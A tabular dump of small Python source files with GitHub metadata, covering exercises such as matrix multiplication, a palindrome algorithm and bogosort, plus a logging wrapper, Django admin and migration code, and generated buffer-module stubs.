blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cdf830ae3e0835a12624bfd2c5ef4c83e633a614
|
313afbb1ea19f2266571870c7461f2591e30ea7b
|
/src/lab/lab01/z_7_macierze.py
|
e11a427c91a7ab0da9a9a38c400254c006be1ae9
|
[] |
no_license
|
tborzyszkowski/LogikaProgramowania
|
89201a76ddc60692ffccaf7c4c7b17d4e1e2c0e8
|
cceb161a6ff5933d2acc31f15879cafcf03b285b
|
refs/heads/master
| 2022-06-23T18:41:29.460094
| 2022-06-17T16:18:29
| 2022-06-17T16:18:29
| 250,095,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
from random import random
# Build an N x N identity matrix and an N x N matrix of random ints,
# then print both followed by their matrix product.
N = 2

# m1: the identity matrix (int(i == j) is the Kronecker delta).
m1 = [[int(i == j) for j in range(N)] for i in range(N)]

# m2: random integers drawn from [0, 99].
m2 = [[int(random() * 100) for _ in range(N)] for _ in range(N)]

print("m1:")
for row in m1:
    print(row)
print("\n-----------\n")

print("m2:")
for row in m2:
    print(row)
print("\n-----------\n")

# Classic triple-loop matrix multiplication: wynik = m1 @ m2.
wynik = []
for i in range(N):
    out_row = []
    for j in range(N):
        out_row.append(sum(m1[i][k] * m2[k][j] for k in range(N)))
    wynik.append(out_row)

for row in wynik:
    print(row)
|
[
"t.borzyszkowski@gmail.com"
] |
t.borzyszkowski@gmail.com
|
2e80e028db2b748647fa57e8c02cd4029b2f9c93
|
27b3c7f8e144a3f6f4699e49d7df85c2918b3b23
|
/customlogger/custom_logger.py
|
a00a7935d53ac335c2646f71ecfd4cfe3e79646e
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
deresmos/customlogger
|
ddf0aabba7435816a5e160474e3545758cc078a4
|
6f6bbda8caeaa27a15d4981732ac7e57a525ea6f
|
refs/heads/master
| 2021-07-18T21:50:54.808304
| 2018-06-28T06:08:01
| 2018-06-28T06:08:01
| 98,201,131
| 1
| 1
|
MIT
| 2018-06-05T14:55:59
| 2017-07-24T14:40:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,725
|
py
|
# imports {{{1
import logging
import os
from os.path import expanduser
from colorlog import ColoredFormatter
from customlogger.only_filter import OnlyFilter
from customlogger.run_rotating_handler import RunRotatingHandler
# }}}
class CustomLogger:
    """Convenience wrapper around :mod:`logging`.

    Class attributes hold shared default settings (levels, formats, paths);
    an instance lazily configures and returns its underlying
    ``logging.Logger`` the first time the :attr:`logger` property is read.
    """

    # class variable {{{1
    # Level aliases so callers never need to import logging themselves.
    NOTSET = logging.NOTSET
    DEBUG = logging.DEBUG
    INFO = logging.INFO
    WARNING = logging.WARNING
    ERROR = logging.ERROR
    CRITICAL = logging.CRITICAL

    # File/directory defaults used when file logging is enabled.
    allLogFileName = 'all.log'
    logDirPath = './log'

    # Default thresholds: console shows warnings+, files record debug+.
    streamLevel = WARNING
    fileLevel = DEBUG

    isSaveLog = False   # also write log files when True
    isColorLog = True   # colorize console output via colorlog
    backupCount = 5     # backups kept by RunRotatingHandler

    # Format strings for the various handlers.
    fileLogFmt = '%(asctime)s %(levelname)s %(filename)s %(name)s ' \
        '%(lineno)s "%(message)s"'
    streamLogFmt = '%(levelname)-8s %(message)s'
    streamDebugLogFmt = '[%(levelname)s: File "%(filename)s", ' \
        'line %(lineno)s, in %(funcName)s] "%(message)s"'
    streamColorLogFmt = '%(log_color)s%(levelname)-8s%(reset)s %(message)s'
    streamColorDebugLogFmt = '[%(log_color)s%(levelname)s%(reset)s: ' \
        'File "%(filename)s", line %(lineno)s, in %(funcName)s] "%(message)s"'
    dateFmt = '%Y-%m-%d %a %H:%M:%S'

    # Level -> color mapping handed to colorlog.ColoredFormatter.
    logColors = {
        'DEBUG': 'cyan',
        'INFO': 'green',
        'WARNING': 'yellow',
        'ERROR': 'red',
        'CRITICAL': 'red,bg_white',
    }

    # class methods {{{1
    # debugMode {{{2
    @classmethod
    def debugMode(cls):
        """Lower the console threshold to DEBUG for loggers built afterwards."""
        cls.streamLevel = CustomLogger.DEBUG

    # property {{{1
    @property
    def logger(self):
        """Return the wrapped logger, configuring it on first access."""
        if not self.__logger.handlers or self.__isFirstInitLogger:
            self.setLogger()
        return self.__logger

    # private functions {{{1
    def __init__(  # {{{2
            self, parent=None, logger_name=None, is_default=True):
        """Create a wrapper.

        parent: object whose class name becomes the logger name when
            ``logger_name`` is not given; defaults to this wrapper itself.
        logger_name: explicit logger name (takes precedence over ``parent``).
        is_default: when True, ``setLogger`` installs the default handlers.
        """
        name = parent or self
        name = logger_name or type(name).__name__
        logger = logging.getLogger(name)
        self.__logger = logger
        self.isDefault = is_default
        # A logger that already has handlers was configured elsewhere
        # (loggers are process-global); don't add handlers to it again.
        self.__isFirstInitLogger = True
        if self.__logger.handlers:
            self.__isFirstInitLogger = False

    @staticmethod  # __createLogDir {{{2
    def __createLogDir(path):
        """Create *path* (``~`` expanded) unless it already exists."""
        path = expanduser(path)
        if os.path.isdir(path):
            return
        os.mkdir(path)
        print('Create log directory. ({})'.format(os.path.abspath(path)))

    # public functions {{{1
    def setLogger(self):  # {{{2
        """Apply the default configuration (no-op when is_default is False)."""
        if self.isDefault:
            self.defaultLoggerSetting()

    def defaultLoggerSetting(self):  # {{{2
        """Install the default console handlers (and file handlers if enabled)."""
        self.__logger.setLevel(CustomLogger.DEBUG)
        if self.isColorLog:
            if self.streamLevel <= self.DEBUG:
                fmt = self.streamColorDebugLogFmt
            else:
                fmt = self.streamColorLogFmt
            self.addStreamColorHandler(self.streamLevel, fmt=fmt)
        else:
            if self.streamLevel <= self.DEBUG:
                fmt = self.streamDebugLogFmt
            else:
                fmt = self.streamLogFmt
            self.addStreamHandler(self.streamLevel, fmt=fmt)
        # Extra INFO-only handler; check_level skips it when the main
        # stream handler already shows INFO messages.
        self.addStreamHandler(
            CustomLogger.INFO, is_only=True, check_level=True)
        if self.isSaveLog:
            self.__createLogDir(self.logDirPath)
            self.addFileHandler(self.fileLevel)
            self.addRunRotatingHandler(CustomLogger.DEBUG, self.backupCount)

    def addHandler(  # {{{2
            self,
            handler,
            level,
            fmt=None,
            datefmt=None,
            is_only=False,
            formatter=None,
    ):
        """Attach *handler* with level, formatter and an optional OnlyFilter.

        A pre-built ``formatter`` wins over ``fmt``/``datefmt``.
        """
        handler.setLevel(level)
        datefmt = datefmt or self.dateFmt
        formatter = formatter or logging.Formatter(fmt, datefmt)
        handler.setFormatter(formatter)
        # set only filter: handler then emits records of exactly this level
        if is_only:
            handler.addFilter(OnlyFilter(level))
        self.__logger.addHandler(handler)

    def addStreamHandler(  # {{{2
            self, level, fmt=None, is_only=False, check_level=False):
        """Attach a plain console handler (skipped when already covered)."""
        if check_level and self.streamLevel <= level:
            return
        handler = logging.StreamHandler()
        self.addHandler(handler, level, fmt=fmt, is_only=is_only)

    def addStreamColorHandler(  # {{{2
            self, level, fmt=None, is_only=False, check_level=False):
        """Attach a colorized console handler (skipped when already covered)."""
        if check_level and self.streamLevel <= level:
            return
        handler = logging.StreamHandler()
        formatter = ColoredFormatter(
            fmt,
            log_colors=self.logColors,
            style='%',
        )
        self.addHandler(handler, level, is_only=is_only, formatter=formatter)

    def addFileHandler(  # {{{2
            self, level, out_path=None, fmt=None, is_only=False):
        """Attach a FileHandler; defaults to logDirPath/allLogFileName."""
        out_path = expanduser(
            out_path or os.path.join(self.logDirPath, self.allLogFileName))
        handler = logging.FileHandler(out_path)
        fmt = fmt or self.fileLogFmt
        self.addHandler(handler, level, fmt, is_only)

    def addRotatingFileHandler(  # {{{2
            self,
            level,
            out_path,
            max_bytes,
            backup_count,
            fmt=None,
            is_only=False):
        """Attach a size-based rotating file handler.

        Bug fix: ``logging.handlers`` is a submodule that a bare
        ``import logging`` does not load, so the original attribute lookup
        ``logging.handlers.RotatingFileHandler`` could raise
        ``AttributeError``; the submodule is now imported explicitly.
        """
        from logging.handlers import RotatingFileHandler
        handler = RotatingFileHandler(
            filename=out_path, maxBytes=max_bytes, backupCount=backup_count)
        fmt = fmt or self.fileLogFmt
        self.addHandler(handler, level, fmt, is_only)

    def addRunRotatingHandler(  # {{{2
            self,
            level,
            backup_count,
            out_path=None,
            fmt=None,
            is_only=False):
        """Attach the project's per-run rotating handler (RunRotatingHandler)."""
        out_path = expanduser(out_path or self.logDirPath)
        handler = RunRotatingHandler(out_path, backup_count)
        fmt = fmt or self.fileLogFmt
        self.addHandler(handler, level, fmt, is_only)
    # }}}1
|
[
"deresmos@gmail.com"
] |
deresmos@gmail.com
|
809595d1fa3df5a45abcab47ef7dd4d58698b915
|
8af8544612d10260d1eaf4c613e599aaafc8f4c7
|
/cal/admin.py
|
48bd114c5a689fcc66e2fa9e1edc167617f235d1
|
[] |
no_license
|
Noeuclides/djangocalendar
|
46979e7249adc94c449b7bd54888f752936a9a46
|
4a7fed9ae73989190c8b1f620de81af48248b788
|
refs/heads/master
| 2023-07-31T21:42:25.638017
| 2020-06-22T22:32:15
| 2020-06-22T22:32:15
| 273,511,608
| 0
| 0
| null | 2021-09-22T19:16:05
| 2020-06-19T14:20:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,114
|
py
|
from django.contrib import admin
from cal.models import *
class EventAdmin(admin.ModelAdmin):
    # Event change list: show id/title/grade, all clickable.
    list_display = ('id', 'title', 'grade')
    list_display_links = ('id', 'title', 'grade')
class ChallengeAdmin(admin.ModelAdmin):
    # Challenge change list: show id/name/grade, all clickable.
    list_display = ('id', 'name', 'grade')
    list_display_links = ('id', 'name', 'grade')
class GradeAdmin(admin.ModelAdmin):
    # Grade change list: show id/name, both clickable.
    list_display = ('id', 'name')
    list_display_links = ('id', 'name')
class ActivityAdmin(admin.ModelAdmin):
    # Activity change list: show id/name/event, all clickable.
    list_display = ('id', 'name', 'event')
    list_display_links = ('id', 'name', 'event')
class WorkTeamAdmin(admin.ModelAdmin):
    # WorkTeam change list: show id/challenge, both clickable.
    list_display = ('id', 'challenge')
    list_display_links = ('id', 'challenge')
class WA_Admin(admin.ModelAdmin):
    # workteam_activity change list: show id/workteam/activity/state.
    list_display = ('id', 'workteam', 'activity', 'state')
    list_display_links = ('id', 'workteam', 'activity', 'state')
# Wire each model of the cal app to its ModelAdmin on the default admin site.
admin.site.register(Event, EventAdmin)
admin.site.register(Challenge, ChallengeAdmin)
admin.site.register(Grade, GradeAdmin)
admin.site.register(Activity, ActivityAdmin)
admin.site.register(WorkTeam, WorkTeamAdmin)
admin.site.register(workteam_activity, WA_Admin)
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
0a45a862d3c529f57cce59103290f55dc8ab44f8
|
057fde8a8ab9622a3524cb880c7ace5a15c0f355
|
/set7/70.py
|
4b1fb8e3c9d5e4a6348aeeaf197facb1e7fb3b10
|
[] |
no_license
|
ramyasutraye/Guvi_Python
|
e9ba6eb812ec8014214dce77d710ce230bbb8020
|
2fed3c460185fbf7bcf64c068084bcdb7d840140
|
refs/heads/master
| 2020-04-23T19:30:21.003061
| 2018-05-25T10:43:14
| 2018-05-25T10:43:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
# Print the smallest power of two strictly greater than the given number.
a = int(input("Enter any number:"))

# Exponents 0 .. a-1 are always enough once a >= 3.
for exponent in range(a):
    value = 2 ** exponent
    if value > a:
        print(value)
        break

# Small inputs never trigger the loop's print; handle them explicitly.
if a == 2:
    print("4")
elif a in (1, 0):
    print("2")
|
[
"noreply@github.com"
] |
ramyasutraye.noreply@github.com
|
4fd5d0b3cf69ec3401158708578acd35b429b996
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/0000-0099/0005.manacher.py
|
fb347e485f03f4f36cd8545c32505243e8a5b10e
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679
| 2020-12-22T20:57:19
| 2020-12-22T20:57:19
| 233,179,192
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
class Solution:
    def longestPalindrome(self, s: str) -> str:
        """Return a longest palindromic substring of *s* (Manacher's algorithm).

        Works on a virtual augmented string of length 2*len(s)+1 whose even
        indices are '#' separators and odd indices are characters of *s*;
        this makes every palindrome odd-length, so one pass covers both
        odd- and even-length palindromes of *s*.
        """
        n = 2 * len(s) + 1
        # augmented s with '#' — computed on the fly instead of materialized
        ss = lambda s, i: s[(i - 1) // 2] if i % 2 else '#'
        # c: center of palindrome with rightmost position
        c = 0
        # r: right of palindrome with rightmost position
        r = 0
        # i: current position under investigation, c <= i <= r
        i = 0
        # j: reflect of i w.r.t c
        # j = lambda i, c: 2 * c - i
        # p: length (radius in augmented units) of palindrome at each position
        p = [0 for _ in range(n)]
        # mi/ml: center and radius of the best palindrome found so far
        mi = -1
        ml = -1
        # loop through i w.r.t manacher algorithm
        for i in range(n):
            if (r < i):
                # i is beyond the known window; restart a window at i.
                c, r = i, i
            # 2 * c - i - p[2 * c - i] == 2 * c - r
            if p[2 * c - i] == r - i:
                # The mirror palindrome touches the window's left edge, so
                # p[i] is at least r - i; try to extend past r by comparison.
                while 2 * i - r >= 0 and r < n and ss(s, 2 * i - r) == ss(s, r):
                    r += 1
                r -= 1
                c = i
                p[i] = r - i
            else:
                # Fully determined by the mirror position (capped by window).
                p[i] = min(p[2 * c - i], r - i)
            if p[i] > ml:
                mi = i
                ml = p[i]
            # print(i, c, r, [ss(s, i) + ':' + str(p[i]) for i in range(n)])
        # Map augmented center/radius back to a slice of the original s.
        return s[((mi - ml) // 2):((mi + ml) // 2)]
if __name__ == '__main__':
    # Smoke-test the solver on a few small strings with known answers.
    solver = Solution()
    cases = [
        "aba",
        "aabba",
        "aababa",
        "aabbaa",
    ]
    rslts = [solver.longestPalindrome(s) for s in cases]
    for cs, rs in zip(cases, rslts):
        print(f"case: {cs} | solution: {rs}")
|
[
"gyang274@gmail.com"
] |
gyang274@gmail.com
|
bc576f8ef94ce910cccb8942737b54d6b3bf8daa
|
c071eb46184635818e8349ce9c2a78d6c6e460fc
|
/system/python_stubs/1336907795/Scripts/_testbuffer.py
|
706a5b806e0bdf4a96417ae23fce495550448982
|
[] |
no_license
|
sidbmw/PyCharm-Settings
|
a71bc594c83829a1522e215155686381b8ac5c6e
|
083f9fe945ee5358346e5d86b17130d521d1b954
|
refs/heads/master
| 2020-04-05T14:24:03.216082
| 2018-12-28T02:29:29
| 2018-12-28T02:29:29
| 156,927,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,549
|
py
|
# encoding: utf-8
# module Scripts._testbuffer
# from C:\Users\siddh\PycharmProjects\Introduction to Python\.idea\VirtualEnvironment\Scripts\_testbuffer.pyd
# by generator 1.145
# no doc
# no imports
# Variables with simple values
# Flag constants mirrored from CPython's C _testbuffer extension; values
# are whatever the compiled module exported when this stub was generated.
ND_FORTRAN = 4
ND_GETBUF_FAIL = 64
ND_GETBUF_UNDEFINED = 128
ND_MAX_NDIM = 128
ND_PIL = 16
ND_REDIRECT = 32
ND_SCALAR = 8
ND_VAREXPORT = 1
ND_WRITABLE = 2
# PyBUF_* buffer-request flag combinations (see the CPython buffer protocol).
PyBUF_ANY_CONTIGUOUS = 152
PyBUF_CONTIG = 9
PyBUF_CONTIG_RO = 8
PyBUF_C_CONTIGUOUS = 56
PyBUF_FORMAT = 4
PyBUF_FULL = 285
PyBUF_FULL_RO = 284
PyBUF_F_CONTIGUOUS = 88
PyBUF_INDIRECT = 280
PyBUF_ND = 8
PyBUF_READ = 256
PyBUF_RECORDS = 29
PyBUF_RECORDS_RO = 28
PyBUF_SIMPLE = 0
PyBUF_STRIDED = 25
PyBUF_STRIDED_RO = 24
PyBUF_STRIDES = 24
PyBUF_WRITABLE = 1
PyBUF_WRITE = 512
# functions
# Auto-generated stubs: the generator could not recover real signatures,
# so each function accepts anything and does nothing.
def cmp_contig(*args, **kwargs): # real signature unknown
    pass
def get_contiguous(*args, **kwargs): # real signature unknown
    pass
def get_pointer(*args, **kwargs): # real signature unknown
    pass
def get_sizeof_void_p(*args, **kwargs): # real signature unknown
    pass
def is_contiguous(*args, **kwargs): # real signature unknown
    pass
def py_buffer_to_contiguous(*args, **kwargs): # real signature unknown
    pass
def slice_indices(*args, **kwargs): # real signature unknown
    pass
# classes
class ndarray(object):
    """Auto-generated stub for the C-implemented ``_testbuffer.ndarray``.

    Signatures were unknown to the stub generator; method bodies are
    placeholders and properties are opaque defaults.
    """
    def add_suboffsets(self, *args, **kwargs): # real signature unknown
        pass
    def memoryview_from_buffer(self, *args, **kwargs): # real signature unknown
        pass
    def pop(self, *args, **kwargs): # real signature unknown
        pass
    def push(self, *args, **kwargs): # real signature unknown
        pass
    def tobytes(self, *args, **kwargs): # real signature unknown
        pass
    def tolist(self, *args, **kwargs): # real signature unknown
        pass
    def __delitem__(self, *args, **kwargs): # real signature unknown
        """ Delete self[key]. """
        pass
    def __getattribute__(self, *args, **kwargs): # real signature unknown
        """ Return getattr(self, name). """
        pass
    def __getitem__(self, *args, **kwargs): # real signature unknown
        """ Return self[key]. """
        pass
    def __hash__(self, *args, **kwargs): # real signature unknown
        """ Return hash(self). """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass
    def __setitem__(self, *args, **kwargs): # real signature unknown
        """ Set self[key] to value. """
        pass
    # Opaque property placeholders emitted by the stub generator.
    contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    c_contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    flags = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    format = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    f_contiguous = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    itemsize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    nbytes = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    ndim = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    obj = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    offset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    readonly = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    shape = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    strides = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    suboffsets = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class staticarray(object):
    """Auto-generated stub for ``_testbuffer.staticarray`` (no upstream doc)."""
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass
# variables with complex values
# NOTE(review): the stub generator replaces unrepresentable runtime values
# with None; the real module-level values exist only in the compiled .pyd.
__loader__ = None # (!) real value is ''
__spec__ = None # (!) real value is ''
|
[
"siddharthnatamai@gmail.com"
] |
siddharthnatamai@gmail.com
|
e7567675022bdbdfd9b443dd0209766b03578342
|
9f2ea36883c5fbd2b96132917e4939d5f99de400
|
/flask_mongo_profiler/contrib/flask_admin/formatters/lookup.py
|
c500c2d56a60f9c56a9b70753024b9727317fc00
|
[
"MIT"
] |
permissive
|
eduflow/flask-mongo-profiler
|
80803111e1c4e5a817401d1339571c8475c9b84c
|
a267eeb49fea07c9a24fb370bd9d7a90ed313ccf
|
refs/heads/master
| 2023-05-27T01:58:24.860787
| 2018-12-15T21:16:57
| 2018-12-15T21:18:54
| 154,967,856
| 0
| 0
|
MIT
| 2023-05-22T21:35:44
| 2018-10-27T13:31:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,265
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from flask import Markup
from ..helpers import get_list_url_filtered_by_field_value
def search_field_formatter(view, context, model, name):
    """Render a field value followed by an icon link that toggles filtering
    the admin list view by that field's value.

    Shows a "search" icon when no filter is applied (link applies the
    filter) and a "remove" icon when one is (link clears it).

    Bug fix: the joined fragments previously ran together with no space
    between HTML attributes (e.g. ``data-role="tooltip"title ...`` and
    ``"Clear filter"style=...``), producing malformed markup; the literals
    now carry separating spaces.
    """
    filter_url = get_list_url_filtered_by_field_value(view, model, name)
    filter_applied = False
    if filter_url is None:  # currently filtered: build the clear-filter URL
        filter_url = get_list_url_filtered_by_field_value(
            view, model, name, reverse=True
        )
        filter_applied = True
    return Markup(
        ''.join(
            [
                model[name],
                ' ',
                '<a href="{href}" class="{classname}" data-role="tooltip" '.format(
                    href=filter_url,
                    classname='fa fa-{icon} glyphicon glyphicon-{icon}'.format(
                        icon='search' if not filter_applied else 'remove'
                    ),
                ),
                'title data-original-title="{}" '.format(
                    'Filter {} by {}'.format(name, model[name])
                    if not filter_applied
                    else 'Clear filter'
                ),
                'style="text-decoration:none"',
                '></a>',
            ]
        )
    )
|
[
"tony@git-pull.com"
] |
tony@git-pull.com
|
4e4334450f22bbbdb6cbd28d91bea30372bf64eb
|
8fa938eddcc75eb7dff1f2055c49cb3817a00c63
|
/String/ex49.py
|
60dfa2055e3999b694cd7c97f3c9dca529ba9fc5
|
[] |
no_license
|
jayhebe/w3resource_exercises
|
f27109759d112b0611574aa70eb378ace447c2a0
|
b29aa7c806f6021a8988e83bb9f674522a41380d
|
refs/heads/master
| 2020-05-07T09:23:24.039271
| 2020-01-30T15:05:06
| 2020-01-30T15:05:06
| 180,374,062
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
def get_vowels(char_str):
    """Return the vowels of *char_str*, in order of appearance, as a list."""
    vowels = set("aeiouAEIOU")
    return [letter for letter in char_str if letter in vowels]
if __name__ == '__main__':
    # Demo: prints the vowels found in 'w3resource'.
    print(get_vowels("w3resource"))
|
[
"jayhebe1983@sina.com"
] |
jayhebe1983@sina.com
|
d6285ad479fd73931af9354c270848582cab80b4
|
d3b829dc03641fba2a57c816891a021ab7d5b505
|
/fluent_contents/migrations/0001_initial.py
|
d713326b77ede1588edb67715503f41e8d68659b
|
[
"Apache-2.0"
] |
permissive
|
django-fluent/django-fluent-contents
|
7af8c0782f1e99832cae6c4f1ed3d99e72097199
|
5577567303d29b56fd48128c22c7dc5d8b2c7476
|
refs/heads/master
| 2023-02-21T01:44:34.935089
| 2021-11-17T08:55:16
| 2021-11-17T08:58:26
| 3,145,163
| 84
| 18
|
Apache-2.0
| 2023-02-15T20:50:09
| 2012-01-10T12:54:57
|
Python
|
UTF-8
|
Python
| false
| false
| 4,207
|
py
|
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates ContentItem and Placeholder plus their
    generic-FK wiring to django.contrib.contenttypes.

    Auto-generated Django migration — edit with care; applied databases
    depend on its exact operations.
    """
    dependencies = [("contenttypes", "0001_initial")]
    operations = [
        migrations.CreateModel(
            name="ContentItem",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                # parent_id + parent_type form a generic relation to the
                # object that owns this content item.
                ("parent_id", models.IntegerField(null=True)),
                (
                    "language_code",
                    models.CharField(default="", max_length=15, editable=False, db_index=True),
                ),
                ("sort_order", models.IntegerField(default=1, db_index=True)),
                (
                    "parent_type",
                    models.ForeignKey(to="contenttypes.ContentType", on_delete=models.CASCADE),
                ),
            ],
            options={
                "ordering": ("placeholder", "sort_order"),
                "verbose_name": "Contentitem link",
                "verbose_name_plural": "Contentitem links",
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name="Placeholder",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "slot",
                    models.SlugField(
                        help_text="A short name to identify the placeholder in the template code.",
                        verbose_name="Slot",
                    ),
                ),
                (
                    "role",
                    models.CharField(
                        default="m",
                        help_text="This defines where the object is used.",
                        max_length=1,
                        verbose_name="Role",
                        choices=[
                            ("m", "Main content"),
                            ("s", "Sidebar content"),
                            ("r", "Related content"),
                        ],
                    ),
                ),
                ("parent_id", models.IntegerField(null=True)),
                (
                    "title",
                    models.CharField(max_length=255, verbose_name="Admin title", blank=True),
                ),
                (
                    "parent_type",
                    models.ForeignKey(
                        blank=True,
                        to="contenttypes.ContentType",
                        null=True,
                        on_delete=models.CASCADE,
                    ),
                ),
            ],
            options={
                "verbose_name": "Placeholder",
                "verbose_name_plural": "Placeholders",
            },
            bases=(models.Model,),
        ),
        # One placeholder per (owner object, slot).
        migrations.AlterUniqueTogether(
            name="placeholder",
            unique_together={("parent_type", "parent_id", "slot")},
        ),
        # Added after both models exist to break the creation cycle.
        migrations.AddField(
            model_name="contentitem",
            name="placeholder",
            field=models.ForeignKey(
                related_name="contentitems",
                on_delete=django.db.models.deletion.SET_NULL,
                to="fluent_contents.Placeholder",
                null=True,
            ),
            preserve_default=True,
        ),
        # django-polymorphic bookkeeping column for ContentItem subclasses.
        migrations.AddField(
            model_name="contentitem",
            name="polymorphic_ctype",
            field=models.ForeignKey(
                related_name="polymorphic_fluent_contents.contentitem_set+",
                editable=False,
                to="contenttypes.ContentType",
                on_delete=models.CASCADE,
                null=True,
            ),
            preserve_default=True,
        ),
    ]
|
[
"vdboor@edoburu.nl"
] |
vdboor@edoburu.nl
|
2f6e18a5f4ba8b0456377676821bca0328fe208c
|
8311a0bcf3f2126d622f928483ce2ea9d6a7cb0d
|
/Code/Matthew/python/bogosort.py
|
8a5e8b1541f2a5351db02b7bfa5859e5544947c6
|
[] |
no_license
|
guam68/class_iguana
|
857247dca0ff732d11f7fb0d3dc761ec83846c94
|
e4359d32dfe60423a643c21df5636669016ad2c0
|
refs/heads/master
| 2020-05-01T06:33:22.611127
| 2019-03-13T23:07:41
| 2019-03-13T23:07:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,570
|
py
|
# import random
# def bubble_sort(nums):
# for i in range(len(nums)):
# for j in range(len(nums)-1):
# if nums[j] > nums[j+1]:
# nums[j], nums[j+1] = nums[j+1], nums[j]
#
# nums = [random.randint(0,99) for i in range(100)]
# print(nums)
# bubble_sort(nums)
# print(nums)
import random
import time
def random_list(n):
    """Return a list of *n* random integers drawn uniformly from [0, 99]."""
    return [random.randint(0, 99) for _ in range(n)]
def shuffle_nums(nums):
    """Shuffle *nums* in place by swapping each position with a random index."""
    size = len(nums)
    for src in range(size):
        dst = random.randint(0, size - 1)
        nums[src], nums[dst] = nums[dst], nums[src]
def is_sorted(nums):
    """Return True when *nums* is in non-decreasing order."""
    return all(a <= b for a, b in zip(nums, nums[1:]))
def percent_sorted(nums):
    """Return the fraction of adjacent pairs already in non-decreasing order."""
    ordered_pairs = sum(1 for a, b in zip(nums, nums[1:]) if a <= b)
    return ordered_pairs / (len(nums) - 1)
def get_time():
    """Return the current wall-clock time in whole milliseconds."""
    milliseconds = time.time() * 1000
    return int(round(milliseconds))
def bogosort(nums):
    """Sort *nums* in place by reshuffling until sorted; prints the count.

    Expected shuffles grow factorially with len(nums) — demo code only.
    """
    counter = 0
    start_time = get_time()
    while not is_sorted(nums):
        shuffle_nums(nums)
        counter += 1
    end_time = get_time()
    # time_taken is computed but currently only used by the commented prints.
    time_taken = end_time - start_time
    # print(f'total time taken: {time_taken/1000} seconds')
    # print(f'time per step: {time_taken/1000/counter} second')
    print(f'bogosort: {counter}')
def bogosort_optimized(nums):
    """Hill-climbing bogosort: keep a shuffle only when it is "more sorted".

    Returns the sorted list as a new object — the caller's list is NOT
    sorted in place, so the return value must be used.
    """
    ps = percent_sorted(nums)
    counter = 0
    # Exact float equality is fine here: percent_sorted returns
    # count/(len-1), which is exactly 1.0 once every pair is ordered.
    # while abs(ps-1.0) > 0.00001:
    while ps != 1.0:
        counter += 1
        nums_temp = nums.copy()
        shuffle_nums(nums_temp)
        pst = percent_sorted(nums_temp)
        if pst > ps:
            # Accept the shuffle only when it improves sortedness.
            nums = nums_temp
            ps = pst
    print(f'bogosort_optimized: {counter}')
    return nums
def sqrt_optimized(x):
    """"Compute" the square root of *x* by guessing random candidates.

    Prints the number of attempts and returns the first candidate whose
    square equals *x*. Candidates are drawn from [0, x), so this only
    terminates (with probability 1) for perfect squares whose root is
    below x — e.g. x = 1 loops forever since every candidate is 0.
